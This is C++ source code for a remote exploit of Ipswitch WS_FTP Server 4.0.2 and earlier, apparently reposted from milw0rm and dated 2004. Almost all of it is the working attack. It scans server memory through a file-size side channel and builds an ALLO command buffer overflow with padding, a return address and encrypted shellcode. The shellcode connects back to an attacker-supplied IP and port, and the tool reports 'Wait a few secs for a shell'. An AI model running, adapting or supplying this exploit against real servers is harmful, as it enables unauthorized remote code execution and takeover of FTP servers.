int xuser::read_serv_mem_bytes(unsigned addr, void* dst, int dstlen)
|
|
{
|
|
for (int i = 0; i < (int)dstlen; )
|
|
{
|
|
int len = read_serv_mem(addr+i, (char*)dst+i, dstlen-i);
|
|
if (len <= 0)
|
|
return len;
|
|
i += len;
|
|
}
|
|
|
|
return dstlen;
|
|
}
|
|
|
|
int xuser::read_serv_mem_string(unsigned addr, char* dst, int dstlen)
|
|
{
|
|
int len = read_serv_mem(addr, dst, dstlen);
|
|
if (len <= 0)
|
|
return len;
|
|
if (dst[len-1] != 0)
|
|
return -1;
|
|
return len;
|
|
}
|
|
|
|
int xuser::read_serv_mem_uint32(unsigned addr, unsigned* dst)
|
|
{
|
|
unsigned char tmp[4];
|
|
int ret = read_serv_mem_bytes(addr, tmp, sizeof(tmp));
|
|
if (ret <= 0)
|
|
return ret;
|
|
if (ret != sizeof(tmp))
|
|
return -1;
|
|
|
|
*dst = (tmp[3] << 24) | (tmp[2] << 16) | (tmp[1] << 8) | tmp[0];
|
|
return ret;
|
|
}
|
|
|
|
int xuser::exploit(unsigned long sip, unsigned short sport)
|
|
{
|
|
int ret = 0;
|
|
char* shellcode = NULL;
|
|
char* badbuf = NULL;
|
|
__try
|
|
{
|
|
/*
|
|
* Encrypt the shellcode
|
|
*/
|
|
const shellcode_len = sizeof(shlc2_code)-1;
|
|
shellcode = new char[shellcode_len+1];
|
|
memcpy(shellcode, shlc2_code, shellcode_len);
|
|
shellcode[shellcode_len] = 0;
|
|
|
|
shellcode[2] = (char)2;
|
|
shellcode[3] = (char)(2 >> 8);
|
|
shellcode[4] = (char)(sport >> 8);
|
|
shellcode[5] = (char)sport;
|
|
shellcode[6] = (char)(sip >> 24);
|
|
shellcode[7] = (char)(sip >> 16);
|
|
shellcode[8] = (char)(sip >> 8);
|
|
shellcode[9] = (char)sip;
|
|
for (int i = 0; i < 8; i++)
|
|
{
|
|
if (!enc_byte(shellcode[2+i], shellcode[2+8+i], is_valid_shlc2))
|
|
__leave;
|
|
}
|
|
|
|
for (int i = 0; i < 4; i++)
|
|
{
|
|
int k = get_enc_key(&shellcode[shlc2_offs_encstart], shlc2_offs_encend-shlc2_offs_encstart, i, 4, is_valid_shlc2);
|
|
if (k < 0)
|
|
__leave;
|
|
shellcode[shlc2_offs_enckey+i] = k;
|
|
}
|
|
msg("[+] Shellcode encryption key = %02X%02X%02X%02X\n",
|
|
(unsigned char)shellcode[shlc2_offs_enckey+3],
|
|
(unsigned char)shellcode[shlc2_offs_enckey+2],
|
|
(unsigned char)shellcode[shlc2_offs_enckey+1],
|
|
(unsigned char)shellcode[shlc2_offs_enckey]);
|
|
for (int i = 0; i < shlc2_offs_encend-shlc2_offs_encstart; i++)
|
|
shellcode[shlc2_offs_encstart+i] ^= shellcode[shlc2_offs_enckey + i % 4];
|
|
|
|
/*
|
|
* Do some sanity checks
|
|
*/
|
|
if (!check_invd_bytes("shellcode", shellcode, shellcode_len, is_valid_shlc2) ||
|
|
!check_invd_bytes("ret_addr", ret_addr, 4, is_valid_shlc2))
|
|
__leave;
|
|
|
|
if (!delete_file(s, temp_file))
|
|
{
|
|
msg("Could not delete file\n");
|
|
__leave;
|
|
}
|
|
|
|
unsigned tot_size;
|
|
if (!get_user_total_file_size(s, tot_size))
|
|
__leave;
|
|
|
|
msg("[+] Scanning server memory: ");
|
|
quite_you = 1;
|
|
const unsigned ADDR_START = SERV_STK_SIZE;
|
|
const unsigned ADDR_END = MAX_ADDR-1;
|
|
unsigned this_ptr;
|
|
for (unsigned addr = ADDR_START; ; addr += SERV_STK_SIZE)
|
|
{
|
|
if (addr > ADDR_END || !addr)
|
|
{
|
|
/*
|
|
* Can happen if the address of the thread's stack is not in the same position in
|
|
* memory. This most likely happens when another user logged in or it sent a FTP
|
|
* command which creates a new server thread. Try again.
|
|
*/
|
|
msg2("[-] Could not find the this ptr. Try again.\n");
|
|
__leave;
|
|
}
|
|
int rc = read_serv_mem_uint32(addr + SERV_STK_OFFS + SERV_STK_THIS_OFFS, &this_ptr);
|
|
if (rc < 0)
|
|
{
|
|
msg2("- unknown error\n"); // Error
|
|
__leave;
|
|
}
|
|
else if (rc == 0)
|
|
{
|
|
msg2("x"); // Crashed
|
|
}
|
|
else
|
|
{
|
|
msg2("."); // Bingo
|
|
|
|
char tmp[0x200];
|
|
if (this_ptr + SERV_THIS_USERNAME_OFFS < MAX_ADDR && this_ptr + SERV_THIS_CMDBUF_OFFS < MAX_ADDR &&
|
|
read_serv_mem_string(this_ptr + SERV_THIS_USERNAME_OFFS, tmp, sizeof(tmp)) > 0 &&
|
|
!strcmp(tmp, username) &&
|
|
read_serv_mem_string(this_ptr + SERV_THIS_CMDBUF_OFFS, tmp, sizeof(tmp)) > 0 &&
|
|
!strcmp(tmp, ALLO_STRING))
|
|
break;
|
|
}
|
|
}
|
|
quite_you = 0;
|
|
msg("\n[+] this = %08X\n", this_ptr);
|
|
|
|
const char* s1 = "quota exceeded; ";
|
|
char padding[SERV_BUF_EIP];
|
|
int padding_len = sizeof(padding) - (int)strlen(s1);
|
|
memset(padding, 'A', sizeof(padding));
|
|
|
|
int xpsz = (int)strlen(ALLO_STRING "\r\n") + padding_len + 4 + shellcode_len;
|
|
badbuf = new char[xpsz+1];
|
|
badbuf[xpsz] = 0;
|
|
int tmpidx = 0;
|
|
if (!add_bytes(badbuf, tmpidx, xpsz, ALLO_STRING "\r\n", (int)strlen(ALLO_STRING "\r\n")) ||
|
|
!add_bytes(badbuf, tmpidx, xpsz, padding, padding_len) ||
|
|
!add_bytes(badbuf, tmpidx, xpsz, ret_addr, 4) ||
|
|
!add_bytes(badbuf, tmpidx, xpsz, shellcode, shellcode_len) ||
|
|
tmpidx != xpsz)
|
|
{
|
|
msg("[-] This is a bug. Now you know\n");
|
|
__leave;
|
|
}
|
|
|
|
if (!create_file_for_addr(s, this_ptr + SERV_THIS_CMDBUF_OFFS + strlen(ALLO_STRING "\r\n")))
|
|
__leave;
|
|
if (send_cmd2(s, badbuf) < 0)
|
|
__leave;
|
|
|
|
ret = 1;
|
|
}
|
|
__finally
|
|
{
|
|
quite_you = 0;
|
|
if (shellcode)
|
|
delete shellcode;
|
|
if (badbuf)
|
|
delete badbuf;
|
|
}
|
|
|
|
return ret;
|
|
}
|
|
|
|
void show_help(char* pname)
|
|
{
|
|
msg("%s <ip> <port> <sip> <sport> [-u username] [-p userpass] [-a]\n", pname);
|
|
exit(1);
|
|
}
|
|
|
|
int main(int argc, char** argv)
|
|
{
|
|
msg("Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit\n");
|
|
msg("(c)2004 Hugh Mann hughmann@hotmail.com\n");
|
|
|
|
WSADATA wsa;
|
|
if (WSAStartup(0x0202, &wsa))
|
|
return 1;
|
|
|
|
if (argc < 5)
|
|
show_help(argv[0]);
|
|
|
|
unsigned long ip = ntohl(inet_addr(argv[1]));
|
|
unsigned short port = (unsigned short)atoi(argv[2]);
|
|
unsigned long sip = ntohl(inet_addr(argv[3]));
|
|
unsigned short sport = (unsigned short)atoi(argv[4]);
|
|
const char* username = "anonymous";
|
|
const char* userpass = "Hugh Mann";
|
|
|
|
for (int i = 5; i < argc; i++)
|
|
{
|
|
if (!strcmp(argv[i], "-u") && i + 1 < argc)
|
|
{
|
|
username = argv[++i];
|
|
}
|
|
else if (!strcmp(argv[i], "-p") && i + 1 < argc)
|
|
{
|
|
userpass = argv[++i];
|
|
}
|
|
else if (!strcmp(argv[i], "-a"))
|
|
{
|
|
output_all = 1;
|
|
}
|
|
else
|
|
show_help(argv[0]);
|
|
}
|
|
|
|
if (!ip || !port || !sip || !sport)
|
|
show_help(argv[0]);
|
|
|
|
xuser user;
|
|
if (!user.init(ip, port, username, userpass))
|
|
return 0;
|
|
|
|
if (!user.exploit(sip, sport))
|
|
msg("[-] u n33d t0 s7uddy m0r3...\n");
|
|
else
|
|
msg("[+] Wait a few secs for a shell\n");
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2004-03-23]
|